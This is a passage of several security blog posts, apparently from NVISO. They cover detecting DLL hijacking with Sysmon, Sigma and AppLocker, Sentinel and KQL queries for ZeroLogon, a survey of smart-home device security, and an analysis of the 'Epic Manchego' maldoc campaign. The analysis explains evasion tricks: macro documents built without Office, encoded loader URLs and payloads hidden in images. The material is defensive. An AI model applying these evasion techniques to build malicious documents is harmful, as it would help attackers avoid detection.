Some 20 exist, of which two are authored by NVISO: Maxime Thiebaut’s “Windows Registry Persistence COM Search Order Hijacking”, and Bart Parys and yours truly’s “Fax Service DLL Search Order Hijack”. All of these only cover specific instances of this technique. The reason for this is simply that it is next to impossible to write a rule that covers the many options a red team or adversary has to exploit this technique. Proper detection is achievable, however, by establishing a baseline of your environment and alerting on any DLLs/EXEs loaded from unexpected locations.

While Sysmon can be configured to log ImageLoaded events as event ID 7, this is disabled by default because of the massive amount of logs it would generate.
To help with triaging you can use a PowerShell script to semi-automatically generate a Sysmon config that excludes all known-good DLLs that are loaded.
See the example below for one such (basic) PowerShell script:

# Run this script repeatedly to automatically add the newly used DLLs to the exclusions.
# Do a reboot after installing the "base" Sysmon config to log all the DLLs loaded in the Windows boot process.

# Modify to point to the Sysmon executable.
$SYSMON_EXECUTABLE = "C:\Sysmon\Sysmon64.exe"
# Modify to point to the new config. (Will be overwritten by a run of the script!)
$CONFIG_FILE = "C:\Sysmon\config.xml"

Function Get-DLLs {
    # Using a HashSet to avoid having to filter for duplicates
	$dlls = New-Object System.Collections.Generic.HashSet[String]
	
    try {
        # Retrieve all Sysmon ImageLoaded events
	    $events = Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "Event[System[(EventID=7)]]"
        # Extract the ImageLoaded from the events' Message fields
		$events.Message | ForEach-Object -Process {
			$loaded = (Select-String -InputObject $_ -Pattern "ImageLoaded: (.*)").Matches.Groups[1]
			$dlls.add($loaded) | Out-Null
		}
	} catch {}
	
    # Sort before returning for consistent & managable output
	$dlls | Sort-Object
}

Function Export-SysmonConfig {
	Param($dlls)
	
	$XMLHeader = @"
<Sysmon schemaversion=`"4.22`">
    <EventFiltering>
        <RuleGroup name="" groupRelation=`"or`">
            <ImageLoad onmatch=`"exclude`">

"@
	$XMLTrailer = @"
            </ImageLoad>
        </RuleGroup>
    </EventFiltering>
</Sysmon>
"@
    # To indent <ImageLoaded> for readability.
    $Offset = "                "
	
	Function Format-Exclusion {
		Param($dll)
		$dll = $dll.trim()
		$Offset + "<ImageLoaded condition=`"is`">$dll</ImageLoaded>`n"
	}
		
	$XMLConfig = $XMLHeader
	$XMLConfig += $Offset + "<ImageLoaded condition=`"is`">$SYSMON_EXECUTABLE</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\System32\</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\SysWOW64\</ImageLoaded>`n"
	foreach ($dll in $dlls) {
		$XMLConfig += Format-Exclusion $dll
	}
	$XMLConfig += $XMLTrailer
	
	$XMLConfig
}

$dlls = Get-DLLs
Export-SysmonConfig $dlls | Tee-Object -FilePath $CONFIG_FILE
# Install the new config to lower the amount of logs generated.
Start-Process -FilePath $SYSMON_EXECUTABLE -ArgumentList @('-c', $CONFIG_FILE)

Be sure to only execute this on a known-good device, such as a freshly imaged laptop or a new VM:
If you use a potentially compromised device to generate this, there is a chance of excluding a malicious DLL that can then remain completely undetected in your environment.
You will need to run this every time a piece of software gets updated, as the loaded DLLs may change (new DLLs added, older DLLs no longer relevant) depending on the version of the software.

Note that to limit the amount of exclusions the config needs, the C:\Windows\System32\ and C:\Windows\SysWOW64\ directories are excluded in their entirety by the script.
You should set up a SIEM alert for Sysmon event ID 11 (FileCreate) if the TargetFileName starts with either of these directories.
A Sigma rule to detect this looks as follows:

title: DLL Created In Windows System Folder
id: ddc5624d-4127-4787-8cd9-e0943ebb10e8
status: experimental
description: |
  Detects new DLLs written to the Windows system folders.
  Can be used to gain persistence on a system by exploiting DLL hijacking vulnerabilities.
references: 
  - https://blog.nviso.eu/2020/10/06/mitre-attack-turned-purple-part-1-hijack-execution-flow
tags:
  - attack.t1574.001
  - attack.t1574.002
author: NVISO
date: 2020/10/05
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 11
    TargetFilename|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
    TargetFilename|endswith: '.dll'
  condition: selection
falsepositives:
  - Driver installations
  - Some other software installations 
level: high

If your configuration is correct, you should not generate any Sysmon event ID 7 for legitimate DLLs and you can simply alert on any occurrence of the event as potentially malicious.
Any DLLs dropped in the excluded directories get flagged by the Sigma rule for proper coverage.
Even if your Sysmon config is not covering 100% of the legitimately loaded DLLs, the volume of generated events should be low enough to be workable, and additional filtering can also be done in a SIEM or automated in a SOAR solution, for example.
With sufficient time, your detection capabilities for this technique should be tuned finely enough as to not generate many false positives.

Detection for this technique is obviously not cut and dried, but it is possible to have very good coverage, provided your blue team gets a proper testing environment to improve their detection capabilities.

Prevention of this technique works very similarly to detection:
One can write AppLocker policies to only allow known DLLs to load.
You can create a list of loaded DLLs by setting the policy to audit for several weeks and appending DLLs that were missed by the initial testing to the list of known-good ones before enforcing your policies.
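
As an illustration only (paths are assumptions, and the DLL rule collection still needs to be enabled and set to “Audit only” via Group Policy or secpol.msc), the built-in AppLocker PowerShell cmdlets can generate such an allow list:

# Sketch: build an allow list from the DLLs currently present under Program Files
Get-AppLockerFileInformation -Directory 'C:\Program Files\' -Recurse -FileType Dll |
    New-AppLockerPolicy -RuleType Publisher,Hash -User Everyone -Optimize -Xml |
    Out-File 'C:\Policies\DllAllowList.xml'
# Merge the generated rules into the local policy while it is still in audit mode
Set-AppLockerPolicy -XmlPolicy 'C:\Policies\DllAllowList.xml' -Merge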

The script and rule in this blogpost are available on our GitHub.

Conclusion

We hope that this blogpost has provided you with actionable information and has given you more insight into leveraging this technique and defending against it.
This was the first blogpost of a recurring series; we hope to see you again when we cover another ATT&CK technique in the near future!
From all of us at NVISO, stay safe!

About the author(s)

  • Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. When he is not working, you can probably find Jean-François in the Gym or conducting research. Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
    He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
    You can find Jean-François on LinkedIn and on Hack The Box.
  • Remco Hofman is an intrusion analyst in NVISO’s MDR team, always looking at improving the detection capabilities of the service. A few cups of properly brewed tea help him unwind after a long day’s work.
    You can find him on Twitter or LinkedIn.

Sentinel Query: Detect ZeroLogon (CVE-2020-1472)

17 September 2020 at 09:56

In August 2020 Microsoft patched the ZeroLogon vulnerability CVE-2020-1472. In summary, this vulnerability would allow an attacker with a foothold in your network to become a domain admin in a few clicks. The attacker only needs to establish a network connection towards the domain controller.

At NVISO we support multiple clients with our MDR services; from that perspective, our security experts analyzed the vulnerability and created queries for both Sentinel and threat hunting (“Advanced Hunting”) to detect these types of activities in your network.

One requirement for running Sentinel queries is of course that you have on-boarded Active Directory event logs in your Sentinel log analytics workspace. This can be done by installing the Microsoft Monitoring Agent and forwarding the events towards said workspace.

In case these logs are available you can use the query below to detect activities related to the ZeroLogon vulnerability. Within this query, you have to replace DC1$ and DC2$ with the hostname(s) of your Domain Controllers.

//Search for anonymous logons, note this may produce FPs
SecurityEvent
| extend EvData = parse_xml(EventData)
| extend EventDetail = EvData.EventData.Data
| extend TargetUserName_CS = EventDetail.[1].["#text"], SubjectUserSid_CS = EventDetail.[4].["#text"], SubjectUserName_CS = EventDetail.[5].["#text"]
| project-away EvData, EventDetail
| where ((EventID == 4742)
    and (TargetUserName_CS in~ ("DC1$", "DC2$"))
     and ((SubjectUserName_CS contains "anonymous") or (SubjectUserSid_CS startswith "S-1-0") or (SubjectUserSid_CS startswith "S-1-5-7")))

The following image shows an example output of this query:

Should Sentinel not be available or the workspace not have been set up, we also include a KQL (Kusto Query Language) query to be used in Advanced Hunting:

//Search for anonymous logons, note this may produce FPs
union DeviceLogonEvents, DeviceProcessEvents
| where AccountName in~ ("anonymous") or InitiatingProcessAccountName in~ ("anonymous") or
AccountSid startswith "S-1-0" or InitiatingProcessAccountSid startswith "S-1-0" or
AccountSid startswith "S-1-5-7" or InitiatingProcessAccountSid startswith "S-1-5-7"
//Remove FP
| where InitiatingProcessFileName != "ntoskrnl.exe"
| summarize by Timestamp, DeviceId, ReportId, DeviceName, AccountName, InitiatingProcessAccountName, AccountSid,
InitiatingProcessAccountSid, AccountDomain, InitiatingProcessFileName, ProcessCommandLine, AdditionalFields

Note that Anonymous Logons should be investigated either way. While this may be a False Positive such as the host itself, an Administrator or a Service account – it can also indicate malicious behavior. Use the Sentinel query below to investigate further.

//Once a detection from previous rule has hit, use the following to validate - if there IS a logon, investigate further. If not, it's likely a False Positive
SecurityEvent 
| where ((EventID == 4624) and (TargetUserName =~ "DC1$"))
| distinct SubjectUserName

One way of investigating further whether this is a False Positive or not, is to leverage the Netlogon log, and correlating or comparing the output with results from running the queries above. This log is by default disabled, but can be enabled as follows on the affected Domain Controller (DC):  

  1. Execute the following commands in an elevated prompt:
    • Nltest /DBFlag:2080FFFF
    • net stop netlogon
    • net start netlogon
  2. The same can be achieved with (elevated) PowerShell:
    • Nltest /DBFlag:2080FFFF
    • Restart-Service Netlogon
  3. Investigate the log file that will be created. Note it may take a while to reproduce the event. The log file is found at: %windir%\debug\netlogon.log
  4. Correlate the event(s) from before in the Netlogon log. Once identified, you can disable Netlogon logging again by setting the DBFlag back to 0x0.
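
For example, from an elevated prompt (a minimal sketch mirroring the commands above):

Nltest /DBFlag:0x0
net stop netlogon
net start netlogon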

The following query will assist in detecting whenever a vulnerable Netlogon secure channel connection is allowed – keep in mind however this will only work should you have already applied the patch:

//This query will work ONLY after the patch has been applied. It warrants further investigation.
Event
| where EventID == 5829

On top of this we also wrote an additional KQL query to search for evidence – specifically, if someone has (intentionally or not) disabled Enforcement Mode.

//Netlogon enforcement explicitly disabled
union DeviceProcessEvents, DeviceRegistryEvents
| where RegistryKey contains "\\system\\currentcontrolset\\services\\netlogon\\parameters"
| where RegistryValueName == "FullSecureChannelProtection"
| where RegistryValueType == "Dword"
| where RegistryValueData == 0 or RegistryValueData == 0x00000000
| summarize by Timestamp, DeviceId, ReportId, DeviceName, RegistryKey, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine

Note that the Kusto hunting queries can also be leveraged as Detection Rules, which allows for proactive alerting.

In case you want additional details about the queries or Sentinel please do not hesitate to reach out! You can contact the blog authors or via filling in the contact form on our website https://www.nviso.eu.

References

Our research is based upon the following references

Authors

This blog post was created based on the collaborative effort of :

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the base security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: there’s a long road ahead of this industry to grow in maturity when it comes to security.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market for smart home devices has been growing steadily for quite some time now, and that is not expected to change anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms or might even be spying on people through their internet-connected camera. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce to our daily lives really? I’ve tried to find out exactly that.

The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this proved to be not always easy: Wireshark will tell you if TLS is being used or not, but aside from that, how can we determine if a raw TCP or UDP data stream is encrypted or not? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)

The above results indicate that while some devices used state-of-the-art, standardised and, most importantly, secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TCP/UDP streams) or has been proven insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: every single device sent at least some data that was likely not encrypted; even the devices that encrypted the majority of their communications still sent DNS or sometimes NTP requests unencrypted over the network.

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network. That has been a serious violation of secure web development practices for a really long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces need the same care and protection as any other exposed service. The fact that a device isn’t directly reachable over the internet doesn’t mean that an attacker who has gained access to the local network won’t try to gain a larger foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.

What this concretely means is that there’s no straightforward, easy way to get an insight in the security of the devices. Gaining such knowledge would require tailored, targeted security assessments: a time consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding android apps with MobSF (Mobile Security Framework). More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.

I found that a lot of applications were asking for a disproportionally large number of permissions, sometimes even permissions an application arguably would not need to function properly. For example, what use does a smart light bulb app have for requesting permissions to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? For starters, in all the paragraphs above there were some good things, often followed by a ‘but’. Looking at the bigger picture, devices that were properly secured on one front usually also did well on all the others, and vice versa: devices that were lacking certain security controls were usually insecure across the board. In other words, it is quite a hit or miss when it comes to security. Most notably, my results clearly showed what security professionals already knew: security is a complete package. You simply can’t cover just one part and leave the other aspects of your product exposed. Products from manufacturers that understood this used network protocols known to be secure, offered strong authentication options, and showed a user-friendliness that made sure security was taken care of by default, with little effort required from the consumer. The other products often treated security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or maybe not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here – it should never be your only indicator. I found that brand recognition is an important factor in the level of attention a manufacturer will pay to the security of their device. If a brand is well known and needs to uphold a good reputation to stay in business, it will also spend more time on fixing security flaws in the future, even after the product has been out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Epic Manchego – atypical maldoc delivery brings flurry of infostealers

1 September 2020 at 11:33
By: NVISO

In July 2020, NVISO detected a set of malicious Excel documents, also known as “maldocs”, that deliver malware through VBA-activated spreadsheets. While the malicious VBA code and the dropped payloads were something we had seen before, it was the specific way in which the Excel documents themselves were created that caught our attention.

The creators of the malicious Excel documents used a technique that allows them to create macro-laden Excel workbooks, without actually using Microsoft Office. As a side effect of this particular way of working, the detection rate for these documents is typically lower than for standard maldocs.

This blog post provides an overview of how these malicious documents came to be. In addition, it briefly describes the observed payloads and finally closes with recommendations as well as indicators of compromise to help defend your organization from such attacks.

Key Findings (TL;DR)

  • The malicious Microsoft Office documents are created using the EPPlus software rather than Microsoft Office Excel; these documents may fly under the radar as they differ from typical Excel documents;
  • NVISO assesses with medium confidence that this campaign is delivered by a single threat actor based on the limited number of documents uploaded to services such as VirusTotal, and the similarities in payloads delivery throughout this campaign;
  • The payloads that have been observed up to the date of release of this post have been, for the most part, so-called information stealers with the intention of harvesting passwords from browsers, email clients, etc.;
  • The payloads stemming from these documents have evolved only slightly in terms of obfuscation and masquerading. This is another indication of a single actor who is slowly evolving their technical prowess.

Analysis

The analysis section below is divided into two parts, each referring to a specific link in the infection chain.

Malicious document analysis

In an earlier blog post, we wrote about “VBA Purging”[1], which is a technique to remove compiled VBA code from VBA projects. We were interested to see if any malicious documents found in-the-wild were adopting this technique (it lowers the initial detection rate of antivirus products). This is how we stumbled upon a set of peculiar malicious documents.

At first, we thought they were created with Excel, and were then VBA purged. But closer examination leads us to believe that these documents are created with a .NET library that creates Office Open XML (OOXML) spreadsheets. As stated in our VBA Purging blog post, Office documents can also lack compiled VBA code when they are created with tools that are totally independent from Microsoft Office. EPPlus is such a tool. We are familiar with this .NET library, as we have been using it for a couple of years to create malicious documents (“maldocs”) for our red team and penetration testers.

When we noticed that the maldocs had no compiled code, and were also missing Office metadata, we quickly thought about EPPlus. This library also creates OOXML files without compiled VBA code and without Office metadata.

The OOXML file format is an Open Packaging Conventions (OPC) format: a ZIP container with mainly XML files, and possibly binary files (like pictures). It was first introduced by Microsoft with the release of Office 2007. OOXML spreadsheets use the extensions .xlsx and .xlsm (for spreadsheets with macros).

When a VBA project is created with EPPlus, it does not contain compiled VBA code. EPPlus has no methods to create compiled code: the algorithms to create compiled VBA code are proprietary to Microsoft.

The very first malicious document we detected was created on the 22nd of June 2020, and since then 200+ malicious documents have been found over a period of 2 months. The actor has increased their activity in recent weeks, as we now see more than 10 new malicious documents on some days.

Figure 1 – Unique maldocs observed per day

The maldocs discovered over the course of two months have many properties that are quite different from the properties of documents created with Microsoft Office. We believe this is the case because they are created with a tool independent from Microsoft Excel. Although we don’t have a copy of the exact tool used by the threat actor to create these malicious documents, the malicious documents created by this tool have many properties that convince us that they were created with the aforementioned EPPlus software.

Some of EPPlus’ properties include, but are not limited to:

  • Powerful and versatile library: not only can it create spreadsheets containing a VBA project, but that project can also be password protected and/or digitally signed. It does not rely on Microsoft Office. It can also run on Mono (cross platform, open-source .NET).
  • OOXML files created with EPPlus have some properties that distinguish them from OOXML files created with Excel. Here is an overview:
    • ZIP Date: every file included in a ZIP file has a timestamp (DOSDATE and DOSTIME field in the ZIPFILE record). For documents created (or edited) with Microsoft Office, this timestamp is always 1980-01-01 00:00:00 (0x0021 for DOSDATE and 0x0000 for DOSTIME). OOXML files created with EPPlus have a timestamp that corresponds to the creation time of the document. Usually, that timestamp is the same for all files inside the OOXML files, but due to execution delays, there can be a difference of 2 seconds between timestamps (2 seconds is the resolution of the DOSTIME format).

Figure 2 – DOSTIME difference (left: EPPlus created file)

  • Extra ZIP records: a typical ZIP file is composed of ZIP file records (magic 50 4B 03 04) with metadata for the file, and the (compressed) file content. Then there are ZIP directory entries (magic 50 4B 01 02) followed by a ZIP end-of-directory record (magic 50 4B 05 06). Microsoft Office creates OOXML files containing these 3 ZIP record types. EPPlus creates OOXML files containing 4 ZIP record types: it also includes a ZIP data descriptor record (magic 50 4B 07 08) after each ZIP file record.

Figure 3 – Extra ZIP records (left: EPPlus created file)

  • Missing Office document metadata: an OOXML document created with Microsoft Office contains metadata (author, title, …). This metadata is stored inside XML files found inside the docProps folder. By default, documents created with EPPlus don’t have metadata: there is no docProps folder inside the ZIP container.

Figure 4 – Missing metadata (left: EPPlus created file)

  • VBA Purged: OOXML files with a VBA project created with Microsoft Office contain an OLE file (vbaProject.bin) with streams containing the compiled VBA code and the compressed VBA source code. Documents created with EPPlus do not contain compiled VBA code, only compressed VBA source code. This means that:
    • The module streams only contain compressed VBA code
    • There are no SRP streams (SRP streams contain implementation-specific and version-dependent compiled code; their names start with __SRP_)
    • The _VBA_PROJECT stream does not contain compiled VBA code. In fact, the content of the _VBA_PROJECT stream is hardcoded in the EPPlus source code: it’s always CC 61 FF FF 00 00 00.

Figure 5 – Hardcoded stream content (left: EPPlus created file)

In addition to the above, we have also observed some properties of the VBA source code that hint at the use of a creation tool based on a library like EPPlus.

There are a couple of variants to the VBA source code used by the actor (some variants use PowerShell to download the payload, others use pure VBA code). But all these variants contain a call to a loader function with one argument, a string with the URL (either BASE64 or hexadecimal encoded). Like this (hexadecimal example):

Loader”68 74 74 70 …”

Do note that there is no space character between the function name and the argument: there is no space between Loader and ”68 74 74 70 …”.

This is an indication that the VBA code was not entered through the VBA IDE in Office: when you type a statement like this without a space character, the VBA IDE will automatically add the space character for you (even if you copy/paste the code). The absence of this space character reveals that this code was not entered through the VBA IDE, but likely via a library such as EPPlus.

To illustrate these differences in properties, we show examples created with one of our internal tools (ExcelVBA) that uses the EPPlus library. We create a vba.xlsm file with the VBA code from the text file vba.txt using our ExcelVBA tool, and show some of its properties:

Figure 6 – NVISO created XLSM file using the EPPlus library

Figure 7 – Running oledump.py reveals this document was created using the EPPlus library

Some of the malicious documents contain objects that clearly have been created with EPPlus, using some of the example code found on the EPPlus Wiki. We illustrate this with the following example (the first document in this campaign):

Filename: Scan Order List.xlsm
MD5: 8857fae198acd87f7581c7ef7227c34d
SHA256: 8a863b5f154e1ddba695453fdd0f5b83d9d555bae6cf377963c9009c9fa6c9be
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

This document contains a drawing1.xml object (a rounded rectangle) with this name: name=”VBASampleRect”.

Figure 8 – zipdump of maldoc

Figure 9 – Selecting the drawing1.xml object reveals the name

This was created with sample code found on the EPPlus Wiki[2]:

Figure 10 – EPPlus sample code, clearly showing the similarities

Noteworthy is that all maldocs we observed have their VBA project protected with a password. It is interesting to note that the VBA code itself is not encoded/encrypted, it is stored in cleartext (although compressed) [3]. When a document with a password protected VBA project is opened, the VBA macros will execute without the password: the user does not need to provide the password. The password is only required to view the VBA project inside the VBA IDE (Integrated Development Environment):

Figure 11 – Password prompt for viewing the VBA project

We were not able to recover these passwords. We used John the Ripper with the rockyou.txt password list[4], and Hashcat with a small ASCII brute-force attack.

Although each malicious document is unique with its own VBA code, with more than 200 samples analyzed to date, we can generalize and abstract all this VBA code to just a handful of templates. The VBA code will either use PowerShell or ActiveX objects to download the payload. The different strings are encoded using either hexadecimal, BASE64 or XOR-encoding; or a combination of these encodings. A Yara rule to detect these maldocs is provided at the end of this blog post for identification and detection purposes.

Payload analysis

As mentioned in the previous section, a second-stage payload is downloaded from various websites via the malicious VBA code. Each second-stage executable created by its respective malicious document acts as a dropper for the final payload. In order to thwart detection mechanisms such as antivirus solutions, a variety of obfuscation techniques are leveraged, which are however not advanced enough to hide the malicious intent. The infrastructure used by the threat actor appears to mainly comprise compromised websites.

Popular antivirus solutions such as those listed on VirusTotal, shown in Figure 12, commonly identify the second-stage executables as “AgentTesla”. While leveraging VirusTotal for malware identification is not an ideal method, it does show how simple obfuscation can result in an incorrect classification. Throughout this analysis, we’ll explain how only a few of these popular detections turned out to be accurate.

Figure 12: VirusTotal “AgentTesla” mis-identification.

The different obfuscation techniques we observed outline a pattern common to all second-stage executables of operation Epic Manchego. As can be observed in Figure 13, the second stage will dynamically load a decryption DLL. This DLL component then proceeds to extract additional settings and a third-stage payload before transferring the execution to the final payload, typically an information stealer.

Figure 13: Operation Epic Manchego final stage delivery mechanism.

Although the above obfuscation pattern is common to all samples, we have observed an evolution in its complexity as well as a wide variation in perhaps more opportunistic techniques.

                             Early Variants               Recent Variants
DLL Component Obfuscation    Obfuscated base64 encoding   Empty fixed-size structures
Final Payload Obfuscation    Single-PNG encoding          Multi-BMP dictionary encoding
Opportunistic Obfuscation    Name randomisation           Run-time method resolving, Goto flow-control, …

Table 1 – Variant comparison

A common factor of the operation’s second-stage samples is the usage of steganography to obfuscate their malicious intent. Figure 14 shows a partial configuration used in recent variants, where a dictionary of settings, including the final payload, is encoded into hundreds of images that are part of the second stage’s embedded resources.

Figure 14: Partial dictionary encoded in a BMP image

The image itself is part of a second-stage sample with the following properties:

Filename: crefgyu.exe
MD5: 7D71F885128A27C00C4D72BF488CD7CC
SHA256: C40FA887BE0159016F3AFD43A3BDEC6D11078E19974B60028B93DEF1C2F95726
File Size: 761 KB (779.776 bytes)
Compilation Timestamp: 2020-03-09 16:39:33

Noteworthy is the likelihood that the obfuscation process is not built by the threat actors themselves. A careful review of the second-stage steganography decoding routine uncovers how most samples mistakenly contain the final payload twice. In the following representation (Figure 15) of the loader’s configuration, we can see that its payload is indeed duplicated. The complexity of the second- and third-stage payloads furthermore tends to suggest the operation involves different actors, as the initial documents reflect a less experienced actor.

Throughout the multiple dictionary-based variants analyzed we furthermore noticed that, regardless of the final payload, similar keys were used as part of the settings. All dictionaries contained the final payload as “EpkVBztLXeSpKwe” while some, as seen in Figure 15, also contained the same value as “PXcli.0.XdHg”. This suggests a possible builder for payload delivery, which may be used by multiple actors.

Figure 15: Stage 2 decoded dictionary

Within the manually analyzed dataset of 30 distinct dictionary-based second stages, 19 unique final payloads were observed. Of these, the “Azorult” stealer accounts for 50% of the variant’s deliveries (Figure 16). Other payloads include “AgentTesla”, “Formbook”, “Matiex” and “njRAT”, all of which are already well documented. Both “Azorult” and “njRAT” have a noticeable reuse rate.

Figure 16: Dictionary-based payload classification and (re-)usage of samples with trimmed hashes

Our analysis of droppers and respective payloads uncovered a common pattern in obfuscation routines. While opportunistic obfuscation methods may evolve, the delivered payloads remain part of a rather limited set of malware families.
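As a closing illustration of the steganography aspect: once the BMP resources have been extracted from a second-stage sample, their raw pixel data can be dumped for manual inspection. The sketch below does not reimplement the actor’s encoding scheme, which we do not reproduce here; it only shows how the pixel bytes can be recovered with the Pillow library, and the directory layout is hypothetical.

from pathlib import Path

from PIL import Image  # third-party package: pip install Pillow

def dump_bmp_pixel_data(resource_dir: str) -> dict[str, bytes]:
    """Dump raw pixel bytes from extracted BMP resources for manual inspection."""
    dumps = {}
    for bmp_path in sorted(Path(resource_dir).glob("*.bmp")):
        with Image.open(bmp_path) as image:
            dumps[bmp_path.name] = image.tobytes()
    return dumps

# Usage (hypothetical path to the extracted resources of a second-stage sample)
# pixel_dumps = dump_bmp_pixel_data("extracted_resources/")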

Targeting

